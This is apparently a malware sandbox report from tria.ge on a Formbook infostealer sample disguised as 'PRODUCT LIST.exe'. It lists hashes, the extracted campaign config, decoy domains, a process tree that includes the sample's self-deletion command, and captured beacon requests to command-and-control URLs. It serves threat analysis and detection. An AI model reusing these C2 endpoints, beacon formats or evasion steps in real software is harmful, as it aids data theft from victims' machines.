Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

PRODUCT LIST.exe

windows7-x64

10

PRODUCT LIST.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    147s
  • max time network
    139s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/12/2024, 18:02 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    PRODUCT LIST.exe

  • Size

    592KB

  • MD5

    d403ceb699085cfd12ada96aa419a37b

  • SHA1

    8c9831b837374d718e24d35ec7e93f642a2b74ba

  • SHA256

    ac021bbe155b54ac93bd5ca40b6ca6130174d6d192c6fd2011e9677d56c09f4d

  • SHA512

    7c549efb3103fde42fe6cd46d6126846aa24afd29856bd59fcb5d66a0ae3854fc7d52902ddb8e7effac86929aa081c26a82e0b4ee1ce9c617919a5e774a10d68

  • SSDEEP

    12288:9NkLt1ac75ZalBvZ6sOEBb0OAZcELFacWHi+MnMVuL0477oaXnz61QIb:0tkCalCsOw0OACELwTC+TY0gz

Score
10/10
formbookr4gkdiscoveryratspywarestealertrojan

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

r4gk

Decoy

quantalix.com

animalblog-eggs.com

039skz.xyz

guttas.net

lasantadayparty.com

protegerfinanceservices.com

vixtest.xyz

digitaleconomy.global

0xpax.xyz

mobilehome1688.com

themotionpartners.com

valueney.com

hattuafhv.quest

js0061gj.net

360metaverse.biz

seculardata.com

346727688.xyz

smartmapom.com

moksel.com

exoduswatchco.com

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

    trojanspywarestealerformbook
  • Formbook family
    formbook
  • Formbook payload 3 IoCs
    rat
  • Suspicious use of SetThreadContext 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 46 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3436
    • C:\Users\Admin\AppData\Local\Temp\PRODUCT LIST.exe
      "C:\Users\Admin\AppData\Local\Temp\PRODUCT LIST.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:880
      • C:\Users\Admin\AppData\Local\Temp\PRODUCT LIST.exe
        "C:\Users\Admin\AppData\Local\Temp\PRODUCT LIST.exe"
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        PID:3592
    • C:\Windows\SysWOW64\control.exe
      "C:\Windows\SysWOW64\control.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3836
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Users\Admin\AppData\Local\Temp\PRODUCT LIST.exe"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4596

Network

  • flag-us
    DNS
    13.86.106.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.86.106.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    22.49.80.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    22.49.80.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    4.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    4.159.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    149.220.183.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    149.220.183.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    104.219.191.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    104.219.191.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    53.210.109.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    53.210.109.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    241.42.69.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.42.69.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    81.144.22.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    81.144.22.2.in-addr.arpa
    IN PTR
    Response
    81.144.22.2.in-addr.arpa
    IN PTR
    a2-22-144-81deploystaticakamaitechnologiescom
  • flag-us
    DNS
    www.coachingwithkyle.com
    Remote address:
    8.8.8.8:53
    Request
    www.coachingwithkyle.com
    IN A
    Response
    www.coachingwithkyle.com
    IN A
    103.169.142.0
  • flag-au
    GET
    http://www.coachingwithkyle.com/r4gk/?8pjLhtSh=B9UIrDU3EZJBKWXLdcIHJJJj6BNEP43C4FOcgCwrYD3O1U7vSDY8KIddHxGYBTLqh1IR&sZL=ZnLl0TePzLf
    Explorer.EXE
    Remote address:
    103.169.142.0:80
    Request
    GET /r4gk/?8pjLhtSh=B9UIrDU3EZJBKWXLdcIHJJJj6BNEP43C4FOcgCwrYD3O1U7vSDY8KIddHxGYBTLqh1IR&sZL=ZnLl0TePzLf HTTP/1.1
    Host: www.coachingwithkyle.com
    Connection: close
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Wed, 25 Dec 2024 18:04:09 GMT
    Content-Type: text/html
    Content-Length: 167
    Connection: close
    Cache-Control: max-age=3600
    Expires: Wed, 25 Dec 2024 19:04:09 GMT
    Location: https://www.coachingwithkyle.com/r4gk/?8pjLhtSh=B9UIrDU3EZJBKWXLdcIHJJJj6BNEP43C4FOcgCwrYD3O1U7vSDY8KIddHxGYBTLqh1IR&sZL=ZnLl0TePzLf
    Set-Cookie: __cf_bm=mcwuNAsu0h9TZMkNAMJm.2JapDIWY2d.cSn0OJomMug-1735149849-1.0.1.1-KPntSntEUrMoJ.FjSySDtoYFO0qICf13kMngV6zqkMb4hHWYM0Vrrdf59hk.DBe0VQ4kdcA7_WcmJmP4h3LQvw; path=/; expires=Wed, 25-Dec-24 18:34:09 GMT; domain=.www.coachingwithkyle.com; HttpOnly
    expect-ct: max-age=86400, enforce
    x-content-type-options: nosniff
    x-frame-options: SAMEORIGIN
    x-xss-protection: 1; mode=block
    referrer-policy: strict-origin-when-cross-origin
    Server: cloudflare
    CF-RAY: 8f7ac07f19a3cd85-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    0.142.169.103.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    0.142.169.103.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    73.144.22.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    73.144.22.2.in-addr.arpa
    IN PTR
    Response
    73.144.22.2.in-addr.arpa
    IN PTR
    a2-22-144-73deploystaticakamaitechnologiescom
  • flag-us
    DNS
    www.thegisguru.com
    Remote address:
    8.8.8.8:53
    Request
    www.thegisguru.com
    IN A
    Response
    www.thegisguru.com
    IN CNAME
    traff-4.hugedomains.com
    traff-4.hugedomains.com
    IN CNAME
    hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com
    hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com
    IN A
    3.94.41.167
    hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com
    IN A
    52.86.6.113
  • flag-us
    GET
    http://www.thegisguru.com/r4gk/?8pjLhtSh=oJ/WYoP5r4DXJUKd5tMTlDEEa7ALH/YIt9AZOlOu29iKhf/ELsoN0lBkJblNKPLQItGy&sZL=ZnLl0TePzLf
    Explorer.EXE
    Remote address:
    3.94.41.167:80
    Request
    GET /r4gk/?8pjLhtSh=oJ/WYoP5r4DXJUKd5tMTlDEEa7ALH/YIt9AZOlOu29iKhf/ELsoN0lBkJblNKPLQItGy&sZL=ZnLl0TePzLf HTTP/1.1
    Host: www.thegisguru.com
    Connection: close
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Wed, 25 Dec 2024 18:04:25 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=thegisguru.com
    connection: close
  • flag-us
    DNS
    167.41.94.3.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    167.41.94.3.in-addr.arpa
    IN PTR
    Response
    167.41.94.3.in-addr.arpa
    IN PTR
    ec2-3-94-41-167 compute-1 amazonawscom
  • flag-us
    DNS
    www.seculardata.com
    Remote address:
    8.8.8.8:53
    Request
    www.seculardata.com
    IN A
    Response
    www.seculardata.com
    IN CNAME
    seculardata.com
    seculardata.com
    IN A
    15.197.148.33
    seculardata.com
    IN A
    3.33.130.190
  • flag-us
    GET
    http://www.seculardata.com/r4gk/?8pjLhtSh=t1y6tXnxz3ZWXnEmZX9jyesRLHkBpqfhbjbvnOjoydqiMdrhL4Hp0eZ4xZ5HSQIBIyw0&sZL=ZnLl0TePzLf
    Explorer.EXE
    Remote address:
    15.197.148.33:80
    Request
    GET /r4gk/?8pjLhtSh=t1y6tXnxz3ZWXnEmZX9jyesRLHkBpqfhbjbvnOjoydqiMdrhL4Hp0eZ4xZ5HSQIBIyw0&sZL=ZnLl0TePzLf HTTP/1.1
    Host: www.seculardata.com
    Connection: close
    Response
    HTTP/1.1 200 OK
    content-type: text/html
    date: Wed, 25 Dec 2024 18:04:46 GMT
    content-length: 208
    connection: close
  • flag-us
    DNS
    33.148.197.15.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    33.148.197.15.in-addr.arpa
    IN PTR
    Response
    33.148.197.15.in-addr.arpa
    IN PTR
    a2aa9ff50de748dbeawsglobalacceleratorcom
  • flag-us
    DNS
    15.173.189.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    15.173.189.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    www.upcxi.xyz
    Remote address:
    8.8.8.8:53
    Request
    www.upcxi.xyz
    IN A
    Response
  • 103.169.142.0:80
    http://www.coachingwithkyle.com/r4gk/?8pjLhtSh=B9UIrDU3EZJBKWXLdcIHJJJj6BNEP43C4FOcgCwrYD3O1U7vSDY8KIddHxGYBTLqh1IR&sZL=ZnLl0TePzLf
    http
    Explorer.EXE
    405 B
     1.2kB
     5
    5

    HTTP Request

    GET http://www.coachingwithkyle.com/r4gk/?8pjLhtSh=B9UIrDU3EZJBKWXLdcIHJJJj6BNEP43C4FOcgCwrYD3O1U7vSDY8KIddHxGYBTLqh1IR&sZL=ZnLl0TePzLf

    HTTP Response

    301
  • 3.94.41.167:80
    http://www.thegisguru.com/r4gk/?8pjLhtSh=oJ/WYoP5r4DXJUKd5tMTlDEEa7ALH/YIt9AZOlOu29iKhf/ELsoN0lBkJblNKPLQItGy&sZL=ZnLl0TePzLf
    http
    Explorer.EXE
    399 B
     344 B
     5
    4

    HTTP Request

    GET http://www.thegisguru.com/r4gk/?8pjLhtSh=oJ/WYoP5r4DXJUKd5tMTlDEEa7ALH/YIt9AZOlOu29iKhf/ELsoN0lBkJblNKPLQItGy&sZL=ZnLl0TePzLf

    HTTP Response

    302
  • 15.197.148.33:80
    http://www.seculardata.com/r4gk/?8pjLhtSh=t1y6tXnxz3ZWXnEmZX9jyesRLHkBpqfhbjbvnOjoydqiMdrhL4Hp0eZ4xZ5HSQIBIyw0&sZL=ZnLl0TePzLf
    http
    Explorer.EXE
    446 B
     581 B
     6
    6

    HTTP Request

    GET http://www.seculardata.com/r4gk/?8pjLhtSh=t1y6tXnxz3ZWXnEmZX9jyesRLHkBpqfhbjbvnOjoydqiMdrhL4Hp0eZ4xZ5HSQIBIyw0&sZL=ZnLl0TePzLf

    HTTP Response

    200
  • 8.8.8.8:53
    13.86.106.20.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    13.86.106.20.in-addr.arpa

  • 8.8.8.8:53
    22.49.80.91.in-addr.arpa
    dns
    70 B
     145 B
     1
    1

    DNS Request

    22.49.80.91.in-addr.arpa

  • 8.8.8.8:53
    4.159.190.20.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    4.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
     144 B
     1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    149.220.183.52.in-addr.arpa
    dns
    73 B
     147 B
     1
    1

    DNS Request

    149.220.183.52.in-addr.arpa

  • 8.8.8.8:53
    104.219.191.52.in-addr.arpa
    dns
    73 B
     147 B
     1
    1

    DNS Request

    104.219.191.52.in-addr.arpa

  • 8.8.8.8:53
    53.210.109.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    53.210.109.20.in-addr.arpa

  • 8.8.8.8:53
    241.42.69.40.in-addr.arpa
    dns
    71 B
     145 B
     1
    1

    DNS Request

    241.42.69.40.in-addr.arpa

  • 8.8.8.8:53
    81.144.22.2.in-addr.arpa
    dns
    70 B
     133 B
     1
    1

    DNS Request

    81.144.22.2.in-addr.arpa

  • 8.8.8.8:53
    www.coachingwithkyle.com
    dns
    70 B
     86 B
     1
    1

    DNS Request

    www.coachingwithkyle.com

    DNS Response

    103.169.142.0

  • 8.8.8.8:53
    0.142.169.103.in-addr.arpa
    dns
    72 B
     160 B
     1
    1

    DNS Request

    0.142.169.103.in-addr.arpa

  • 8.8.8.8:53
    73.144.22.2.in-addr.arpa
    dns
    70 B
     133 B
     1
    1

    DNS Request

    73.144.22.2.in-addr.arpa

  • 8.8.8.8:53
    www.thegisguru.com
    dns
    64 B
     194 B
     1
    1

    DNS Request

    www.thegisguru.com

    DNS Response

    3.94.41.167
    52.86.6.113

  • 8.8.8.8:53
    167.41.94.3.in-addr.arpa
    dns
    70 B
     123 B
     1
    1

    DNS Request

    167.41.94.3.in-addr.arpa

  • 8.8.8.8:53
    www.seculardata.com
    dns
    65 B
     111 B
     1
    1

    DNS Request

    www.seculardata.com

    DNS Response

    15.197.148.33
    3.33.130.190

  • 8.8.8.8:53
    33.148.197.15.in-addr.arpa
    dns
    72 B
     128 B
     1
    1

    DNS Request

    33.148.197.15.in-addr.arpa

  • 8.8.8.8:53
    15.173.189.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    15.173.189.20.in-addr.arpa

  • 8.8.8.8:53
    www.upcxi.xyz
    dns
    59 B
     124 B
     1
    1

    DNS Request

    www.upcxi.xyz

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/880-13-0x0000000074FE0000-0x0000000075790000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/880-0-0x0000000074FEE000-0x0000000074FEF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/880-2-0x0000000005D70000-0x0000000006314000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/880-3-0x00000000056F0000-0x0000000005782000-memory.dmp

    Filesize

    584KB

    Download

  • memory/880-4-0x00000000057D0000-0x00000000057DA000-memory.dmp

    Filesize

    40KB

    Download

  • memory/880-5-0x0000000074FE0000-0x0000000075790000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/880-10-0x0000000006720000-0x0000000006774000-memory.dmp

    Filesize

    336KB

    Download

  • memory/880-7-0x0000000074FEE000-0x0000000074FEF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/880-8-0x0000000074FE0000-0x0000000075790000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/880-9-0x0000000006520000-0x00000000065BC000-memory.dmp

    Filesize

    624KB

    Download

  • memory/880-1-0x0000000000C80000-0x0000000000D1A000-memory.dmp

    Filesize

    616KB

    Download

  • memory/880-6-0x0000000005C30000-0x0000000005C3C000-memory.dmp

    Filesize

    48KB

    Download

  • memory/3436-18-0x00000000025D0000-0x0000000002682000-memory.dmp

    Filesize

    712KB

    Download

  • memory/3436-22-0x00000000025D0000-0x0000000002682000-memory.dmp

    Filesize

    712KB

    Download

  • memory/3436-26-0x0000000002750000-0x0000000002826000-memory.dmp

    Filesize

    856KB

    Download

  • memory/3436-27-0x0000000002750000-0x0000000002826000-memory.dmp

    Filesize

    856KB

    Download

  • memory/3436-29-0x0000000002750000-0x0000000002826000-memory.dmp

    Filesize

    856KB

    Download

  • memory/3592-14-0x0000000000F70000-0x00000000012BA000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/3592-17-0x0000000000F20000-0x0000000000F34000-memory.dmp

    Filesize

    80KB

    Download

  • memory/3592-16-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

    Download

  • memory/3592-11-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

    Download

  • memory/3836-20-0x0000000000BE0000-0x0000000000C07000-memory.dmp

    Filesize

    156KB

    Download

  • memory/3836-19-0x0000000000BE0000-0x0000000000C07000-memory.dmp

    Filesize

    156KB

    Download

  • memory/3836-21-0x0000000000D80000-0x0000000000DAF000-memory.dmp

    Filesize

    188KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.